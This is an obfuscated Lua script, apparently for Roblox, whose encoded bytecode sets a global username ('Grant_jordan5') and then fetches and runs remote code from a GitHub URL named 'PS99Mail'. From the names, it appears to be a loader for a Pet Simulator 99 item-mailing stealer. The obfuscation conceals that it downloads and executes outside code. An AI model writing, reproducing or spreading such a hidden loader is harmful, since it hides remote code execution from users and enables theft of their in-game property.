--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v69=v2(v0(v30,16));if v19 then local v77=0;local v78;while true do if (v77==1) then return v78;end if (v77==0) then v78=v5(v69,v19);v19=nil;v77=1;end end else return v69;end end end);local function v20(v31,v32,v33)if v33 then local v70=0 -(1065 -(68 + 997)) ;local v71;while true do if (v70==(0 -0)) then v71=(v31/((3 -(1271 -(226 + 1044)))^(v32-(4 -3))))%((4 -(119 -(32 + 85)))^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v71-(v71%(928 -(214 + 641 + 72))) ;end end else local v72=0 + 0 ;local v73;while true do if (v72==(0 + 0)) then v73=2^(v32-1) ;return (((v31%(v73 + v73))>=v73) and (878 -(282 + 595))) or ((2333 -696) -(1523 + 114)) ;end end end end local function v21()local v34=0 + 0 ;local v35;while true do if (v34==(1 + 0)) then return v35;end if ((957 -(892 + 65))==v34) then v35=v1(v16,v18,v18);v18=v18 + (2 -1) ;v34=1 -0 ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (352 -(87 + 263)) ;return (v37 * (436 -(67 + 113))) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (9 -(13 -8)) ;return (v41 * (12338840 + 4438376)) + (v40 * (260471 -194935)) + (v39 * (1208 -(802 + 150))) + v38 ;end local function v24()local v42=(0 + 0) -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(0 + 0)) then v43=v23();v44=v23();v42=(3643 -2645) -(915 + 82) ;end if (v42==(8 -5)) then if (v47==(0 + 0)) then if (v46==(0 -0)) then return v48 * (1187 -(1069 + 118)) ;else local v102=0;while true do if (v102==(0 -0)) then v47=1 -0 ;v45=0 + (0 -0) ;break;end end end elseif (v47==(3636 -1589)) then return ((v46==(0 + 0)) and (v48 * ((792 -((1227 -(814 + 45)) + 423))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1041 -(10 + (19 -11))) ) * (v45 + (v46/((7 -5)^(494 -(416 + 26))))) ;end if (v42==((1 + 5) -(2 + 2))) then v47=v20(v44,10 + 11 ,54 -23 );v48=((v20(v44,470 -((1030 -(261 + 624)) + 293) )==1) and  -(431 -(44 + 386))) or ((2642 -1155) -(998 + 488)) ;v42=3;end if (v42==(1 + 0)) then v45=1 + 0 ;v46=(v20(v44,1,792 -((1281 -(1020 + 60)) + 571) ) * ((1140 -(116 + 1022))^32)) + v43 ;v42=8 -6 ;end end end local function v25(v49)local v50=1423 -(630 + 793) ;local v51;local v52;while true do if (v50==(9 -6)) then return v6(v52);end if (v50==(9 -7)) then v52={};for v79=1 + 0 , #v51 do v52[v79]=v2(v1(v3(v51,v79,v79)));end v50=2 + 1 ;end if (v50==(0 -0)) then v51=nil;if  not v49 then v49=v23();if (v49==(0 -(0 -0))) then return "";end end v50=1748 -(760 + 987) ;end if (v50==(1914 -(1789 + 124))) then v51=v3(v16,v18,(v18 + v49) -(767 -(745 + 1 + 20)) );v18=v18 + v49 ;v50=2;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=248 -(177 + 71) ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if ((109 -(8 + 98))~=v53) then else v60=nil;v61=nil;v53=882 -(284 + 594) ;end if (v53~=(12 -8)) then else while true do if (v54~=2) then else local v98=0 -0 ;while true do if (v98~=(1 + 0)) then else v54=3;break;end if (0==v98) then v59=nil;v60=nil;v98=1;end end end if ((1901 -(260 + 1638))==v54) then v61=nil;while true do local v103=440 -(382 + 58) ;local v104;while true do if (0~=v103) then else v104=0;while true do if (v104~=(0 -0)) then else local v136=0 -0 ;local v137;while true do if (v136~=(166 -(122 + 44))) then else v137=0 -0 ;while true do if (v137==(3 -2)) then v104=1 + 0 ;break;end if (v137~=(0 + 0)) then else local v162=0 -0 ;while true do if (v162==(1206 -(902 + 303))) then v137=66 -(30 + 35) ;break;end if (v162==(0 -0)) then if (v55==(1 + 0)) then local v164=1690 -(1121 + 569) ;local v165;while true do if (v164==(214 -(22 + 192))) then v165=0;while true do if ((1257 -(1043 + 214))==v165) then v60=v23();v61={};v165=3 -2 ;end if (v165==(5 -3)) then v55=2 -0 ;break;end if (v165==(766 -(468 + 297))) then local v170=0;while true do if (v170==(562 -(334 + 228))) then for v176=1,v60 do local v177=0;local v178;local v179;local v180;local v181;while true do if (v177==(1213 -(323 + 889))) then local v182=0 -0 ;while true do if (v182==(580 -(361 + 219))) then v180=nil;v181=nil;v182=321 -(53 + 267) ;end if (v182==1) then v177=4 -2 ;break;end end end if (2~=v177) then else while true do if (v178==(0 + 0)) then local v190=413 -(15 + 398) ;local v191;while true do if (v190==(0 + 0)) then v191=236 -(141 + 95) ;while true do if (v191~=1) then else v178=983 -(18 + 964) ;break;end if (v191==(0 -0)) then v179=0 + 0 ;v180=nil;v191=2 -1 ;end end break;end end end if (v178==(1 + 0)) then v181=nil;while true do if (v179~=(850 -(20 + 830))) then else local v192=0 + 0 ;local v193;local v194;while true do if (v192==1) then while true do if (v193==(126 -(116 + 10))) then v194=0 -0 ;while true do if (v194==1) then v179=1 + 0 ;break;end if (v194~=(0 + 0)) then else local v205=0 + 0 ;while true do if (v205~=(1 -0)) then else v194=1 + 0 ;break;end if (v205==(738 -(542 + 196))) then v180=v21();v181=nil;v205=164 -(92 + 71) ;end end end end break;end end break;end if ((0 + 0)==v192) then v193=0 -0 ;v194=nil;v192=766 -(574 + 191) ;end end end if (v179~=(1 + 0)) then else if (v180==(1 + 0)) then v181=v21()~=(0 + 0) ;elseif (v180==(4 -2)) then v181=v24();elseif (v180~=(7 -4)) then else v181=v25();end v61[v176]=v181;break;end end break;end end break;end if (v177~=(1551 -(1126 + 425))) then else local v183=0 + 0 ;while true do if (v183~=1) then else v177=406 -(118 + 287) ;break;end if (v183~=(0 -0)) then else v178=1121 -(118 + 1003) ;v179=nil;v183=2 -1 ;end end end end end v59[380 -(142 + 235) ]=v21();v170=4 -3 ;end if ((1 + 0)==v170) then v165=979 -(553 + 424) ;break;end end end end break;end end end if ((0 + 0)==v55) then local v166=0 -0 ;local v167;while true do if (v166==0) then v167=0 -0 ;while true do if (v167==(2 + 0)) then v55=1 + 0 ;break;end if (v167==(1 + 0)) then local v171=0 + 0 ;while true do if (v171==0) then v58={};v59={v56,v57,nil,v58};v171=2 -1 ;end if (v171~=(1 + 0)) then else v167=9 -7 ;break;end end end if (0~=v167) then else local v172=806 -(118 + 688) ;local v173;while true do if ((753 -(239 + 514))==v172) then v173=0;while true do if (v173==(0 + 0)) then v56={};v57={};v173=1;end if (v173~=(1 + 0)) then else v167=1330 -(797 + 532) ;break;end end break;end end end end break;end end end v162=3 -2 ;end end end end break;end end end if (v104==(1 + 0)) then if (v55~=2) then else local v153=0 + 0 ;local v154;local v155;while true do if (v153==(1 -0)) then while true do if (v154==(0 -0)) then v155=0;while true do local v163=1202 -(373 + 829) ;while true do if (0~=v163) then else if (v155==(732 -(476 + 255))) then return v59;end if (v155~=(0 -0)) then else local v168=1130 -(369 + 761) ;local v169;while true do if (v168==(0 + 0)) then v169=0 -0 ;while true do if (v169==(0 -0)) then local v175=0;while true do if (v175==0) then for v184=1,v23() do local v185=0 + 0 ;local v186;local v187;while true do if ((239 -(64 + 174))==v185) then while true do if ((0 + 0)==v186) then v187=v21();if (v20(v187,1,1 + 0 )==(0 + 0)) then local v196=0 + 0 ;local v197;local v198;local v199;local v200;while true do if (v196~=(534 -(43 + 490))) then else v199=nil;v200=nil;v196=2 -0 ;end if (v196~=(336 -(144 + 192))) then else v197=0 -0 ;v198=nil;v196=860 -(240 + 619) ;end if (v196~=(218 -(42 + 174))) then else while true do if (v197~=(1 + 0)) then else local v201=0 -0 ;local v202;while true do if (v201~=(0 + 0)) then else v202=0;while true do if (v202==0) then local v213=0;while true do if (v213==(1744 -(1344 + 400))) then v200={v22(),v22(),nil,nil};if (v198==(1580 -(1183 + 397))) then local v214=0 -0 ;local v215;while true do if (v214~=(0 -0)) then else v215=0;while true do if (v215==0) then v200[3 + 0 ]=v22();v200[1743 -(404 + 1335) ]=v22();break;end end break;end end elseif (v198==(1 + 0)) then v200[3]=v23();elseif (v198==2) then v200[3]=v23() -((1977 -(1913 + 62))^16) ;elseif (v198==(2 + 1)) then local v220=0;local v221;local v222;while true do if (1~=v220) then else while true do if ((406 -(183 + 223))==v221) then v222=0;while true do if (v222~=(0 -0)) then else v200[3 -0 ]=v23() -((1935 -(565 + 1368))^(60 -44)) ;v200[3 + 1 ]=v22();break;end end break;end end break;end if (v220~=(1661 -(1477 + 184))) then else v221=0 + 0 ;v222=nil;v220=1 -0 ;end end end v213=1 + 0 ;end if (v213==(857 -(564 + 292))) then v202=1 -0 ;break;end end end if (v202~=(1 + 0)) then else v197=340 -(118 + 220) ;break;end end break;end end end if (v197==(8 -5)) then if (v20(v199,452 -(108 + 341) ,307 -(244 + 60) )~=(4 -3)) then else v200[4 + 0 ]=v61[v200[480 -(41 + 435) ]];end v56[v184]=v200;break;end if (v197==(1001 -(938 + 63))) then local v204=0;while true do if (v204==0) then local v212=0 + 0 ;while true do if ((1126 -(936 + 189))~=v212) then else v204=1 + 0 ;break;end if (0==v212) then v198=v20(v187,1 + 1 ,3);v199=v20(v187,4,6);v212=1614 -(1565 + 48) ;end end end if (v204==(1820 -(580 + 1239))) then v197=1;break;end end end if (v197==(5 -3)) then if (v20(v199,1,1 + 0 )==1) then v200[2 + 0 ]=v61[v200[1140 -(782 + 356) ]];end if (v20(v199,2,1 + 1 )==(268 -(176 + 91))) then v200[7 -4 ]=v61[v200[7 -4 ]];end v197=4 -1 ;end end break;end end end break;end end break;end if (v185==(1167 -(645 + 522))) then v186=1790 -(1010 + 780) ;v187=nil;v185=1093 -(975 + 117) ;end end end for v188=1876 -(157 + 1718) ,v23() do v57[v188-(1 + 0) ]=v28();end v175=1;end if (v175~=(3 -2)) then else v169=1;break;end end end if (v169==(3 -2)) then v155=1019 -(697 + 321) ;break;end end break;end end end break;end end end break;end end break;end if (v153~=(0 -0)) then else v154=0 -0 ;v155=nil;v153=506 -(351 + 154) ;end end end break;end end break;end end end break;end if (v54==(0 -0)) then local v99=0 -0 ;local v100;while true do if (v99==(0 + 0)) then v100=0;while true do if (v100~=1) then else v54=1 -0 ;break;end if (v100==0) then v55=0 -0 ;v56=nil;v100=2 -1 ;end end break;end end end if (1==v54) then local v101=0;while true do if ((1227 -(322 + 905))==v101) then v57=nil;v58=nil;v101=1 + 0 ;end if (v101~=(612 -(602 + 9))) then else v54=2;break;end end end end break;end if (v53==0) then v54=0;v55=nil;v53=1 + 0 ;end if (v53~=(3 -2)) then else v56=nil;v57=nil;v53=2;end if ((1191 -(449 + 740))~=v53) then else v58=nil;v59=nil;v53=875 -(826 + 46) ;end end end local function v29(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v62[3];return function(...)local v81=v66;local v82=v67;local v83=v68;local v84=v27;local v85=1;local v86= -1;local v87={};local v88={...};local v89=v12("#",...) -1 ;local v90={};local v91={};for v95=0,v89 do if (v95>=v83) then v87[v95-v83 ]=v88[v95 + 1 ];else v91[v95]=v88[v95 + 1 ];end end local v92=(v89-v83) + 1 ;local v93;local v94;while true do v93=v81[v85];v94=v93[1];if (v94<=4) then if (v94<=1) then if (v94>0) then v91[v93[2]]();else v85=v93[3];end elseif (v94<=2) then v91[v93[2]]=v93[3];elseif (v94>3) then local v138=0;local v139;while true do if (v138==0) then v139=v93[2];v91[v139]=v91[v139](v13(v91,v139 + 1 ,v86));break;end end else do return;end end elseif (v94<=7) then if (v94<=5) then local v112=v93[2];local v113,v114=v84(v91[v112](v13(v91,v112 + 1 ,v93[3])));v86=(v114 + v112) -1 ;local v115=0;for v130=v112,v86 do v115=v115 + 1 ;v91[v130]=v113[v115];end elseif (v94==6) then local v140=v93[2];local v141=v91[v93[3]];v91[v140 + 1 ]=v141;v91[v140]=v141[v93[4]];elseif (v91[v93[2]]==v93[4]) then v85=v85 + 1 ;else v85=v93[3];end elseif (v94<=8) then local v116;local v117,v118;local v119;local v120;v64[v93[3]]=v91[v93[2]];v85=v85 + 1 ;v93=v81[v85];if ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v64;else v91[v93[2]]=v64[v93[3]];end v85=v85 + 1 ;v93=v81[v85];if ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v64;else v91[v93[2]]=v64[v93[3]];end v85=v85 + 1 ;v93=v81[v85];v120=v93[2];v119=v91[v93[3]];v91[v120 + 1 ]=v119;v91[v120]=v119[v93[4]];v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]=v93[3];v85=v85 + 1 ;v93=v81[v85];v120=v93[2];v117,v118=v84(v91[v120](v13(v91,v120 + 1 ,v93[3])));v86=(v118 + v120) -1 ;v116=0;for v133=v120,v86 do v116=v116 + 1 ;v91[v133]=v117[v116];end v85=v85 + 1 ;v93=v81[v85];v120=v93[2];v91[v120]=v91[v120](v13(v91,v120 + 1 ,v86));v85=v85 + 1 ;v93=v81[v85];v91[v93[2]]();v85=v85 + 1 ;v93=v81[v85];v85=v93[3];elseif (v94>9) then v64[v93[3]]=v91[v93[2]];elseif ((v93[3]=="_ENV") or (v93[3]=="getfenv")) then v91[v93[2]]=v64;else v91[v93[2]]=v64[v93[3]];end v85=v85 + 1 ;end end;end if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D65030D3O004772616E745F6A6F7264616E35030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F7269000F3O0012023O00013O0026073O00010001000100044O00010001001202000100033O001208000100023O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000200046O00013O00024O00010001000100044O000E000100044O000100012O00033O00017O00",v9(),...);
